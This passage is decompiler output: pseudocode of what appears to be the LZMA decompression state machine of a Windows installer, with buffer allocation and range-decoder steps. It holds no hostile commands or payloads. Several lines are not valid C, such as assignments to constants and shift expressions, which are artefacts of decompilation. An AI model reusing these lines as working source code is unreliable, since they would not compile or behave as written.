						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
